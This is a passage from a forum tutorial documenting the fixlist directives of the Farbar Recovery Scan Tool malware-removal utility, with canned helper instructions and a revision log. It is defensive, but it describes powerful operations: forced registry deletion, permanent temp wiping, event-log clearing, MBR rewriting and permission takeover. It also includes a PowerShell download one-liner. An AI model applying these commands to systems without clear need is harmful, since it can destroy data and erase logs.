 
 
CreateDummy:
 
Creates a locked dummy folder to prevent a restoration of a bad file/folder. The dummy folder should be removed after neutralizing the malware.
 
The syntax is:
 

CreateDummy: path

 
Example:
 

CreateDummy: C:\Windows\System32\bad.exe
CreateDummy: C:\ProgramData\Bad

 

CreateRestorePoint:

To create a restore point.
 
Note:
This directive works only in normal mode. It also attempts to enable System Restore so no need to use the SystemRestore: On directive.



DeleteJunctionsInDirectory:

To remove junctions use the following Syntax:
 

DeleteJunctionsInDirectory: path


Example:
 

DeleteJunctionsInDirectory: C:\Program Files\Windows Defender

 

DeleteKey:
and DeleteValue:

The most efficient way to delete keys/values, bypassing limitations of the standard deletion algorithms present in Reg: and StartRegedit: — EndRegedit:.
 
The syntax is:
 
1. For keys:
 

DeleteKey: key

 
Alternatively, a regedit format could be used:
 

[-key]

 
2. For values:
 

DeleteValue: key|value

 
If the value is a default value, leave the value name empty:
 

DeleteValue: key|

 
Example:

DeleteKey: HKLM\SOFTWARE\Microleaves
DeleteValue: HKEY_CURRENT_USER\Environment|SNF
DeleteValue: HKU\S-1-5-21-3145329596-257967906-3285628945-1000\Software\Clients\StartMenuInternet|
[-HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Dataup]

 
The directives have the ability to delete keys/values that are locked due to insufficient permissions, keys/values that contain embedded-null characters, and registry symbolic links. No need to use the Unlock: directive.

For keys/values that are protected by a running software ("Access denied" response) you need to use Safe Mode (to circumvent the running software) or delete the main components before using the commands.

Note: If the listed key for deletion is a registry link to another key, the (source) key which is the registry symbolic link, will be deleted. The target key will not be deleted. This is done to avoid removing both a bad registry symbolic link that might point at a legitimate key and the legitimate key itself. In a situation where both the source key and the target key are bad, then they both should be listed for deletion.


DeleteQuarantine:

After finishing with cleaning, the %SystemDrive%\FRST (usually C:\FRST) folder made by FRST tool should be removed from the computer. In some cases the folder can't be removed manually because the %SystemDrive%\FRST\Quarantine folder contains locked or unusual malware files or directories. The DeleteQuarantine: command will remove the Quarantine folder.

Tools that move files as opposed to deleting files should not be used to delete C:\FRST as those tools just move the files to their own directory and it remains on the system anyway.
 
Note: The automatic FRST uninstallation (see the description under Introduction) includes the same ability to delete a locked Quarantine.
 
 
DisableService:

To disable a service or driver service you can use the following script:
 

DisableService: ServiceName


Example:
 

DisableService: sptd
DisableService: Wmware Nat Service

 
FRST will set the service to Disabled and the service will not run at the next boot.

Note: The service name should be listed as it appears in the registry or FRST log, without adding anything. For example quotation marks are not required.
 
 
EmptyEventLogs:
 
Clears Windows Event Logs. The total amount of logs cleared and any eventual errors will be listed.
 
 
EmptyTemp:

The following directories are emptied:

  • Windows Temp
  • Users Temp folders
  • Caches, HTML5 storages, Cookies and History for browsers scanned by FRST except Firefox clones
  • Recently opened files cache
  • Discord cache
  • Java cache
  • Steam HTML cache
  • Explorer thumbnail and icon cache
  • BITS transfer queue (qmgr.db and qmgr*.dat files)
  • WinHTTP AutoProxy cache
  • DNS cache
  • Recycle Bin

When EmptyTemp: directive is used the system will be rebooted after the fix. No need to use Reboot: directive.
Also no matter if EmptyTemp: is added at the start, middle, or end of the fixlist it will be executed after all other fixlist lines are processed.

Important: When the EmptyTemp: directive is used items are permanently deleted. They are not moved to quarantine.

Note: The directive is turned off in the Recovery Environment to prevent harm.
 
 
ExportKey: and ExportValue:
 
More reliable way to inspect a key content. The directives overcome some regedit.exe and reg.exe limitations. The difference between the directives is a scope of the export. ExportKey: lists all values and subkeys recursively, while ExportValue: shows only values in the key.
 
The syntax is:
 

ExportKey: key

 

ExportValue: key

 
Example:
 

ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Suspicious Key
================== ExportKey: ===================

[HKEY_LOCAL_MACHINE\SOFTWARE\Suspicious Key]
[HKEY_LOCAL_MACHINE\SOFTWARE\Suspicious Key\InvalidKey  ]
"Hidden Value"="Hidden Data"
[HKEY_LOCAL_MACHINE\SOFTWARE\Suspicious Key\LockedKey]
HKEY_LOCAL_MACHINE\SOFTWARE\Suspicious Key\LockedKey => Access Denied.

=== End of ExportKey ===

 
Note: The export is meant for research purposes only and can't be used for backup and import operations.
 

File:

To check file properties. Multiple files can be included, separated by semicolons.
 

File: path;path


Example:
 

File: C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe

========================= File: C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe ========================

C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe
File not signed
MD5: A209B88B9B2CF7339BE0AC5126417875
Creation and modification date: 2024-03-09 12:20 - 2017-04-10 11:44
Size: 002546176
Attributes: ----A
Company Name: PainteR
Internal Name: ProxyEmu
Original Name: emuext.exe
Product: ProxyEmu
Description: ProxyEmu
File Version: 0.9.1.0
Product Version: 0.9.1.0
Copyright: painter
Virusscan: https://virusscan.jotti.org/filescanjob/k4nj4qatm6

====== End of File: ======

 
Note: The digital signatures check is not available in the Recovery Environment.
 
 
FilesInDirectory: and Folder:
 
To check a folder content. FilesInDirectory: is meant to list specific files matching one or more wildcard * patterns, while Folder: is designed to get the full content of a folder. Output from both the directives includes MD5 checksums (for all files) and digital signatures (for .exe, .dll, .sys and .mui files).
 
The syntax is:
 

FilesInDirectory: path\pattern;pattern

 

Folder: path

 
Example:
 

FilesInDirectory: C:\Windows\desktop-7ec3qg0\*.exe;*.dll
Folder: C:\Windows\desktop-7ec3qg0

Note: The Folder: directive works recursively and lists the content of all subfolders. Therefore, it might produce gigantic logs.
 
 
FindFolder:

See Search features in the Other optional scans section. The directive works in the same way as FindFolder: in the Search box, but results are recorded in the Fixlog.txt.
 

Hosts:

To reset the hosts. Also, see hosts in the Main scan (FRST.txt) section.


ListPermissions:

Used to list permissions on the files/directories/keys included in the script.
 

ListPermissions: path/key


Example:
 

ListPermissions: C:\Windows\Explorer.exe
ListPermissions: C:\Users\User\appdata
ListPermissions: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip
ListPermissions: HKLM\SYSTEM\CurrentControlSet\services\afd

 

Move:


At times renaming or moving a file, specially when it is done across the drives, is troublesome and MS Rename command might fail. To move or rename a file use the following script:
 

Move: source destination


Example:
 

Move: c:\WINDOWS\system32\drivers\afd.sys c:\WINDOWS\system32\drivers\afd.sys.old
Move: c:\WINDOWS\system32\drivers\atapi.bak c:\WINDOWS\system32\drivers\atapi.sys

 
The tool moves the destination file to the Quarantine (if present) then moves the source file to destination location.

Note: Renaming can be carried out when using the Move: directive.

Note: The destination path should contain the file name even if the file is currently missing in destination directory.
 
 
Powershell:

To run PowerShell commands or script files.
 
1. To run a single independent PowerShell command and get the output in the Fixlog.txt the syntax is:
 

Powershell: command

 
Example:
 

Powershell: Get-Service

.
2. To run an independent PowerShell command and get the output in a text file (not in the Fixlog.txt) use redirection operators or Out-File cmdlet:

 

Powershell: command > "Path to a text file"

 

Powershell: command | Out-File "Path to a text file"

 
Example:
 

Powershell: Get-Service > C:\log.txt
Powershell: Get-Process >> C:\log.txt

 
3.
To run a ready script file (.ps1) containing one or more PowerShell commands/lines the syntax is:

 

Powershell: "Path to a script file"

 
Examples:
 

Powershell: C:\Users\UserName\Desktop\script.ps1
Powershell: "C:\Users\User Name\Desktop\script.ps1"

 
4. To run more PowerShell commands/lines of a script as they were in a script file (.ps1), but without creating the .ps1 file, use a semicolon ; instead of line breaks to separate them:
 

Powershell: line 1; line 2; (and so on)

 
Example:
 

Powershell: $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://server/file.exe", "C:\Users\User\Desktop\file.exe")

 
Alternatively, the StartPowershell:EndPowershell: directives could be used (see below).
 
 
Reboot:

To force a restart.

It doesn't matter where in the fixlist you put it. Even if you put it at the start, the reboot will be carried out after all the other fixes are completed.

Note: This command will not work and is not needed in the Recovery Environment.


Reg:

To manipulate Windows Registry using Reg command line tool.
 
The syntax is:
 

Reg: reg command


Example:
 

Reg: reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v Start /t REG_DWORD /d 0x2 /f
Reg: reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" C:\Users\User\Desktop\backup.reg

 
Note: Unlike the native FRST directives, the Reg command should have the proper reg.exe syntax, like use of " quotes in case of space in key/value name.
 
Note: The directive won't handle locked or invalid keys/values. See the DeleteKey: and DeleteValue: description earlier in the tutorial.


RemoveDirectory:

To remove (not move to Quarantine) directories with limited permissions and invalid paths or names. No need to use the Unlock: directive. RemoveDirectory: should be used for directories that resist the usual move operation. If it is used in Safe Mode it should be very powerful and in RE it should be most powerful.

The script will be:
 

RemoveDirectory: path



RemoveProxy:

Removes some Internet Explorer policy restriction settings like "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" or ProxySettingsPerUser in HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings. It removes "ProxyEnable" (if it is set to 1), "ProxyServer", "AutoConfigURL", "DefaultConnectionSettings" and "SavedLegacySettings" values from the machine and users keys. It also applies the BITSAdmin command with NO_PROXY.

In addition, it removes the default value of the "HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies" key if it is altered.

Note: Where there is a running software or a service, that restores those settings, the software should be uninstalled and the service should be removed before using the directive. This to ensure the proxy settings don't return.


Replace:

To replace a file use the following script:
 

Replace: source destination


Example:
 

Replace: C:\WINDOWS\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_cf8ff0d2c0eeb431\dnsapi.dll C:\WINDOWS\system32\dnsapi.dll
Replace: C:\WINDOWS\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_d9e49b24f54f762c\dnsapi.dll C:\WINDOWS\SysWOW64\dnsapi.dll

 
The tool moves the destination file (if present) to Quarantine then copies the source file to destination location.

It will not move the source file and the source file is still in its original location. So in the above example dnsapi.dll in WinSxS directories will be there for future.

Note: The destination path should contain the file name even if the file is currently missing in destination directory.

Note: In case of missing destination directory, the command will fail. FRST doesn't rebuild a complete directory structure. The Copy: directive could be used instead.

 
RestoreFromBackup:

The first time the tool is run it copies the hives to %SystemDrive%\FRST\Hives (usually C:\FRST\Hives) directory as a backup. It will not be overwritten by subsequent running of the tool unless the backup is older than two months. If something went wrong either one of the hives could be restored. The syntax will be:
 

RestoreFromBackup: HiveName


Examples:
 

RestoreFromBackup: software
RestoreFromBackup: system

 
 
RestoreMbr:


To restore the MBR, FRST will use MbrFix that is saved on the flash drive to write a MBR.bin file to a drive. What is needed is the MbrFix/MbrFix64 utility, the MBR.bin to be restored and the script showing the drive:
 

RestoreMbr: Drive=#


Example:
 

RestoreMbr: Drive=0

 
(Note: The MBR to be restored should be named MBR.bin and should be zipped and attached).
 
 
RestoreQuarantine:

You can restore the whole content of Quarantine or restore single or multiple file(s) or folder(s) from Quarantine.

To restore the whole content of Quarantine the syntax is either:

RestoreQuarantine:

Or:

RestoreQuarantine: C:\FRST\Quarantine

 
To restore a file or folder the syntax is:
 

RestoreQuarantine: PathInQuarantine

 
Example:
 

RestoreQuarantine: C:\FRST\Quarantine\C\Program Files\Microsoft Office
RestoreQuarantine: C:\FRST\Quarantine\C\Users\User\Desktop\ANOTB.exe.xBAD

 
To find the path in the Quarantine you can use:

Folder: C:\FRST\Quarantine

Or:

CMD: dir /a/b/s C:\FRST\Quarantine

 
Note
: If a file already exists (outside Quarantine) in the destination path, FRST will not overwrite it. The original file will not be moved and will remain in Quarantine. If however, you still need to restore the file from Quarantine then the file in the destination path should be renamed/removed.

 
 
SaveMbr:

Refer Drives and MBR & Partition Table section in the tutorial.

To make a copy of MBR the following syntax is used:
 

SaveMbr: Drive=#


Example:
 

SaveMbr: Drive=0

 
Note: By doing this there will be MBRDUMP.txt made on the flash drive that should be attached to the post by the user.


SetDefaultFilePermissions:

Created for locked system files/folders. It sets group "Administrators" as owner and depending on the system grants access rights to the standard groups.

Note: The directive will not set TrustedInstaller as the owner but still it could be used for system files/folders that are locked by the malware.

The syntax is:
 

SetDefaultFilePermissions: path

 
 
StartBatch:EndBatch:
 
To create and run a batch file.
 
The syntax is:
 

StartBatch:
Line 1
Line 2
Etc.
EndBatch:

 
The output will be redirected to the Fixlog.txt.
 
 
StartPowershell:EndPowershell:
 
A better alternative to create and run a PowerShell file containing multiple lines (see the Powershell: directive earlier in the tutorial).
 
The syntax is:
 

StartPowershell:
Line 1
Line 2
Etc.
EndPowershell:

 
The output will be redirected to the Fixlog.txt.
 
 
StartRegedit: — EndRegedit:
 
To create and import a registry file (.reg).
 
The syntax is:
 

StartRegedit:
.reg file format
EndRegedit:

 
Including Windows Registry Editor Version 5.00 header is optional, but REGEDIT4 header is required.
 
Example:
 

StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MpsSvc]
"Start"=dword:00000002
EndRegedit:

 
You will get a confirmation in the Fixlog.txt:
 

Registry ====> The operation completed successfully.

 
Note: The confirmation line appears regardless of any eventual errors in your .reg file.
 
Note: The directives won't handle locked or invalid keys/values. See the DeleteKey: and DeleteValue: description earlier in the tutorial.
 

 

Symlink:
 
To list symbolic links or junctions in a folder.
 
The syntax is:

 

Symlink: path

 

Example:

Symlink: C:\Windows

Note: The directive works recursively. Therefore, the scan can take a significant amount of time depending on the location.

 

 

SystemRestore:

To enable or disable System Restore.
 
The syntax is:
 

SystemRestore: On

 

SystemRestore: Off

 
When the On switch is used, FRST checks if there is sufficient free space to enable System Restore. If the requirement is not met, an error will be printed.
 
 
TasksDetails:
 
Lists additional tasks details related to execution time.
 
Example:
 

========================= TasksDetails: ========================

UCBrowserUpdater (LastRunTime: NA -> NextRunTime: 2016-10-13 11:32:00 -> Status: Ready -> Schedule Type: Undefined)

 
Note: The directive is not supported on Windows XP and works only in normal mode.
 
 
testsigning on:

Note: For Windows Vista and later, not supported on Secure Boot enabled devices.

Enabled testsigning is a non-default BCD modification, which could be introduced by malware or users trying to install unsupported drivers. When FRST locates evidence of this sort of tampering it will report like this:
 

testsigning: ==> 'testsigning' is set. Check for possible unsigned driver <===== ATTENTION

 
Inspect the Drivers section looking for a driver matching the warning. Depending on the situation, include the driver together with the warning or the warning alone in the fixlist.

In case of side effects after processing the entries, use the directive to re-enable the testsigning for further troubleshooting.
 
 
Unlock:

In the case of files/directories it sets group "Administrators" as owner and grants access to "Administrators", "Users" and "SYSTEM". It should be used for bad files/directories. To unlock system items, use the SetDefaultFilePermissions: directive.

In the case of registry keys it sets group "Administrators" as owner and grants the groups the usual access and works only on the key applied. It can be used for both bad and legitimate keys.

The syntax is:
 

Unlock: path


Note: To remove an item you don't need to unlock it prior to removing it:
- For files/folders just include the path in the fixlist and FRST will reset permissions and move the objects to Quarantine. To remove a folder permanently use the RemoveDirectory: directive.
- For registry keys deploy the DeleteKey: directive.

 

 

Virusscan:
 
To check files with Jotti. FRST will search for earlier analysis in the Jotti database. A file that has never been submitted to Jotti will be uploaded for analysis.
 
Multiple files can be included, separated by semicolons.

 

Virusscan: path;path

 

 

Zip:

To zip files/folders and save them as Date_Time.zip to the users desktop for subsequent manual uploading by the user. More than one archive will be created for files/folders with duplicated names.
 
As many files/folders as needed can be listed, separated by semicolons.
 

Zip: path;path


Example:
 

Zip: C:\malware.exe;C:\Windows\Minidump;C:\Windows\Logs\CBS\CBS.log

Edited by picasso, 29 March 2024 - 06:36 AM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#12 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:56 PM

Canned Speeches

 

The BBCode syntax might not work on other forums. Please check the code before copying and pasting.

 
 
Scans
 
Example instruction for the malware helper expert to have the user run FRST in normal mode:
 
Please download [url=https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/]Farbar Recovery Scan Tool[/url] and save it to your Desktop.

[color=green][b]Note[/b]: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.[/color]
[LIST]
[*]Right click to run as administrator. When the tool opens click [b]Yes[/b] to disclaimer.[/*]
[*]Press [b]Scan[/b] button.[/*]
[*]It will produce logs called [b]FRST.txt[/b] and [b]Addition.txt[/b] in the same directory the tool is run from.[/*]
[*]Please copy and paste the logs back here.[/*]
[/LIST]
 
Example instruction to run FRST on Windows 7, Windows 8 and Windows 10 in the Recovery Environment (RE):
 
On a clean machine, please download [url=https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/]Farbar Recovery Scan Tool[/url] and save it to a flash drive.

[color=green][b]Note[/b]: You need to download the version compatible with your machine i.e. 32-bit or 64-bit.[/color]

Plug the flashdrive into the infected PC.

Enter [b]System Recovery Environment Command Prompt[/b]:
[LIST]
[*][url=https://www.tenforums.com/tutorials/2880-open-command-prompt-boot-windows-10-a.html]Instructions for Windows 10[/url][/*]
[*][url=https://www.bleepingcomputer.com/tutorials/windows-8-recovery-environment-command-prompt/]Instructions for Windows 8[/url][/*]
[*][url=https://www.bleepingcomputer.com/tutorials/windows-7-recovery-environment-command-prompt/]Instructions for Windows 7[/url][/*]
[/LIST]
[color=#FF0000][b]Once in the Command Prompt:[/b][/color]
[LIST]
[*]In the command window type in [b]notepad[/b] and press [b]Enter[/b].[/*]
[*]The notepad opens. Under File menu select [b]Open[/b].[/*]
[*]Select "Computer" and find your flash drive letter and close the notepad.[/*]
[*]In the command window type [b][color=#FF0000]e[/color]:\frst[/b] (for x64 bit version type [b][color=#FF0000]e[/color]:\frst64[/b]) and press [b]Enter[/b]
[b]Note:[/b] Replace letter [b][color=#FF0000]e[/color][/b] with the drive letter of your flash drive.[/*]
[*]The tool will start to run.[/*]
[*]When the tool opens click Yes to disclaimer.[/*]
[*]Press [b]Scan[/b] button.[/*]
[*]It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.[/*]
[/LIST]
 
Fixes


Example instruction for a fix carried out in normal or safe mode i.e. within Windows:
 
Download attached [b]fixlist.txt[/b] file and save it to the Desktop.

[u][b]NOTE.[/b][/u] It's important that both files, [b]FRST/FRST64[/b] and [b]fixlist.txt[/b] are in the same location or the fix will not work.

[b][color=red]NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system[/color][/b]

Run [b][color=#0000FF]FRST/FRST64[/color][/b] and press the [b]Fix[/b] button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 
Example instructions to run a fix in the Recovery Environment (RE):
 
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it on the flash drive as [b]fixlist.txt[/b]

[quote]
script content
[/quote]

[color=red][b]NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system
[/b][/color]

Now please enter System Recovery Environment Command Prompt.

Run [b]FRST/FRST64[/b] and press the [b]Fix[/b] button just once and wait.
The tool will generate a log on the flashdrive ([b]Fixlog.txt[/b]) please post it in your reply.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#13 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 06:00 PM

Tutorial revisions:

Press "Show" to see previous years amendments.

Spoiler


28/02/2024 All VirusTotal references removed (no longer supported)
28/02/2024 "Chrome apps" explanation added under "Installed Programs"
13/03/2024 Virusscan: directive added
13/03/2024 File: output updated
29/03/2024 Notes under "Restore Points" and CreateRestorePoint: updated


Edited by picasso, 29 March 2024 - 06:45 AM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017




3 user(s) are reading this topic

0 members, 3 guests, 0 anonymous users